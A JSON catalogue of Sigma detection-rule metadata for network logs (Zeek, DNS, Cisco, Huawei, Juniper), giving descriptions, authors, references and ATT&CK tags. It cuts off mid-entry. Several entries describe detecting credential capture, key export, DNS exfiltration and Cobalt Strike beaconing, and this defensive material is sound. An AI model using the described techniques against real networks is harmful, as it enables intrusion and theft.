{ "description": "Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", "meta": { "author": "@neu5ron, SOC Prime", "creation_date": "2020-03-19", "falsepositive": [ "Windows administrator tasks or troubleshooting", "Windows management scripts or software" ], "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1053.002", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "value": "MITRE BZAR Indicators for Execution" }, { "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", "meta": { "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", "creation_date": "2021-08-19", "falsepositive": [ "A DNS lookup does not necessarily mean a successful attempt. Verify a) if there was a response using the zeek answers field; if there was, then verify the connections (conn.log) to those IPs. b) verify if there was HTTP, SSL, or TLS activity to the domain that was queried. The http.log field is 'host' and the ssl/tls field is 'server_name'." 
], "filename": "zeek_dns_mining_pools.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", "value": "DNS Events Related To Mining Pools" }, { "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spool service enabled.", "meta": { "author": "OTR (Open Threat Research), @neu5ron", "creation_date": "2018-11-28", "falsepositive": [ "Domain Controllers that are sometimes (commonly, although they should not be) also acting as print servers" ], "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", "value": "SMB Spoolss Name Piped Usage" }, { "description": "Detects BGP failures which may be indicative of brute-force attacks to manipulate routing", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely, except due to misconfigurations" ], "filename": "cisco_bgp_md5_auth_failed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56fa3cd6-f8d6-4520-a8c7-607292971886", "value": "Cisco BGP Authentication Failures" }, { "description": "Find local accounts being created or modified, as well as remote authentication configurations", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "When remote authentication is in place, this should not change often" ], "filename": "cisco_cli_local_accounts.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" ], "tags": [ "attack.persistence", "attack.t1136.001", "attack.t1098" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", "value": "Cisco Local Accounts" }, { "description": "Collect pertinent data from the configuration files", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Commonly run by administrators" ], "filename": "cisco_cli_collect_data.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm", "https://blog.router-switch.com/2013/11/show-running-config/", "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.collection", "attack.t1087.001", "attack.t1552.001", "attack.t1005" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"cd072b25-a418-4f98-8ebc-5093fb38fe1a", "value": "Cisco Collect Data" }, { "description": "Show when private keys are being exported from the device, or when new certificates are installed", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Not commonly run by administrators. Also whitelist your known good certificates" ], "filename": "cisco_cli_crypto_actions.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.t1553.004", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", "value": "Cisco Crypto Commands" }, { "description": "Clear command history in network OS which is used for defense evasion", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Legitimate administrators may run these commands" ], "filename": "cisco_cli_clear_logs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html", "https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", "value": "Cisco Clear Logs" }, { "description": "See what files are being deleted from flash file systems", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Will be used sometimes by admins to clean up local flash space" ], "filename": "cisco_cli_file_deletion.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1070.004", "attack.t1561.001", "attack.t1561.002" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0af0ca99-357d-4ba1-805f-674fdfb7bef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", "value": "Cisco File Deletion" }, { "description": "Show when a monitor or a span/rspan is setup or modified", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Admins may setup new or modify old spans, or use a monitor for troubleshooting" ], "filename": "cisco_cli_net_sniff.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" ], "tags": [ "attack.credential-access", "attack.discovery", 
"attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", "value": "Cisco Sniffing" }, { "description": "Find information about network devices that is not stored in config files", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Commonly used by administrators for troubleshooting" ], "filename": "cisco_cli_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083", "attack.t1201", "attack.t1057", "attack.t1018", "attack.t1082", "attack.t1016", "attack.t1049", "attack.t1033", "attack.t1124" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", "value": "Cisco Discovery" }, { "description": "See what commands are being input into the device by other people, full credentials can be in the history", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Not commonly run by administrators, especially if remote logging is configured" ], "filename": "cisco_cli_input_capture.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" ], "tags": [ "attack.credential-access", "attack.t1552.003" ] }, "related": [ { "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "value": "Cisco Show Commands Input" }, { "description": "Modifications to a config that will serve an adversary's impacts or persistence", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Legitimate administrators may run these commands" ], "filename": "cisco_cli_modify_config.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" ], "tags": [ "attack.persistence", "attack.impact", "attack.t1490", "attack.t1505", "attack.t1565.002", 
"attack.t1053" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d456de47-a16f-4e46-8980-e67478a12dcb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d0613359-5781-4fd2-b5be-c269270be1f6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", "value": "Cisco Modify Configuration" }, { "description": "Various protocols maybe used to put data on the device for exfil or infil", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Generally used to copy configs or IOS images" ], "filename": "cisco_cli_moving_data.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" ], "tags": [ "attack.collection", "attack.lateral-movement", "attack.command-and-control", "attack.exfiltration", "attack.t1074", "attack.t1105", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "value": "Cisco Stage Data" }, { "description": "Detect a system being 
shutdown or put into different boot mode", "meta": { "author": "Austin Clark", "creation_date": "2019-08-15", "falsepositive": [ "Legitimate administrators may run these commands, though rarely." ], "filename": "cisco_cli_dos.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" ], "tags": [ "attack.impact", "attack.t1495", "attack.t1529", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", "value": "Cisco Denial of Service" }, { "description": "Turn off logging locally or remote", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Unknown" ], "filename": "cisco_cli_disable_logging.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", "value": "Cisco Disabling Logging" }, { "description": "Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS 
labels", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. Except due to misconfigurations" ], "filename": "cisco_ldp_md5_auth_failed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50e606bf-04ce-4ca7-9d54-3449494bbd4b", "value": "Cisco LDP Authentication Failures" }, { "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing.", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. 
Except due to misconfigurations" ], "filename": "huawei_bgp_auth_failed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "huawei", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/huawei/bgp/huawei_bgp_auth_failed.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a557ffe6-ac54-43d2-ae69-158027082350", "value": "Huawei BGP Authentication Failures" }, { "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", "meta": { "author": "Florian Roth (Nextron Systems), Matt Kelly (list of domains)", "creation_date": "2022-06-07", "falsepositive": [ "Unknown" ], "filename": "net_dns_external_service_interaction_domains.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://twitter.com/breakersall/status/1533493587828260866", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.reconnaissance", "attack.t1595.002" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", "value": "DNS Query to External Service Interaction Domains" }, { "description": "Detects wannacry killswitch domain dns queries", "meta": { "author": "Mike Wade", "creation_date": "2020-09-16", "falsepositive": [ "Analyst testing" ], "filename": "net_dns_wannacry_killswitch_domain.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", "value": "Wannacry Killswitch Domain" }, { "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-05-10", "falsepositive": [ "Unknown" ], "filename": "net_dns_mal_cobaltstrike.yml", "level": "critical", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", "value": "Cobalt Strike DNS Beaconing" }, { "description": "Detects strings used in command execution in DNS TXT Answer", "meta": { "author": "Markus Neis", "creation_date": "2018-08-08", "falsepositive": [ "Unknown" ], "filename": "net_dns_susp_txt_exec_strings.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://twitter.com/stvemillertime/status/1024707932447854592", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", "value": "DNS TXT Answer with Possible Execution Strings" }, { "description": "Detects suspicious DNS queries to Monero mining pools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-24", "falsepositive": [ "Legitimate crypto coin mining" ], "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" ], "tags": [ "attack.impact", "attack.t1496", "attack.exfiltration", "attack.t1567" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", "value": "Monero Crypto Coin Mining Pool Lookup" }, { "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-05", "falsepositive": [ "Legitimate use of Telegram bots in the company" ], "filename": "net_dns_susp_telegram_api.yml", "level": "medium", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://core.telegram.org/bots/faq", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ "attack.command-and-control", "attack.t1102.002" ] }, "related": [ { "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c64c5175-5189-431b-a55e-6d9882158251", "value": "Telegram Bot API Request" }, { "description": "Detects suspicious DNS queries using base64 encoding", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-05-10", "falsepositive": [ "Unknown" ], "filename": "net_dns_susp_b64_queries.yml", "level": "medium", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://github.com/krmaxwell/dns-exfiltration", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003", "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": 
"fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", "value": "Suspicious DNS Query with B64 Encoded String" }, { "description": "Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. Except due to misconfigurations" ], "filename": "juniper_bgp_missing_md5.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "juniper", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/juniper/bgp/juniper_bgp_missing_md5.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", "value": "Juniper BGP Missing MD5" }, { "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in 
